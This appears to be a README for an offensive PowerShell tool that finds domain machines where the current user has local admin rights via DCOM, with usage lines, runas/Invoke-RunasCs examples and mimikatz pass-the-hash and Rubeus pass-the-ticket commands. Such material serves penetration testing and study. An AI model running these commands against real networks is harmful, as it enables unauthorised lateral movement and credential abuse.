pol4ir/Find-DCOMLocalAdminAccess

Find-DCOMLocalAdminAccess

Enumerate accessible machines across a domain or local network via DCOM-based techniques

Usage

Find-DCOMLocalAdminAccess -lhost 192.168.56.30
Find-DCOMLocalAdminAccess -lhost 192.168.56.30 -lport 6789 -threads 5 -Computername dc.contoso.local -timeout 10000

RunAs

The script runs under the current user session. If you're in an interactive shell and need to execute it under a different security context, you can use runas:

runas /user:contoso.local\user1 /netonly powershell

If you're working in a non-interactive shell, you can use Invoke-RunasCs:

Invoke-RunasCs -Domain contoso.local -Username user1 -Password dfgV?DS7-8 -Command 'powershell . "C:\Find-DCOMLocalAdminAccess.ps1";Find-DCOMLocalAdminAccess -lhost "192.168.56.30"' -logontype 9

PTH (pass-the-hash)

mimikatz.exe "sekurlsa::pth /domain:<> /user:<user> /ntlm:<hash> /run:powershell.exe"

PTT (pass-the-ticket)

Rubeus.exe -args ptt /ticket:<ticket>
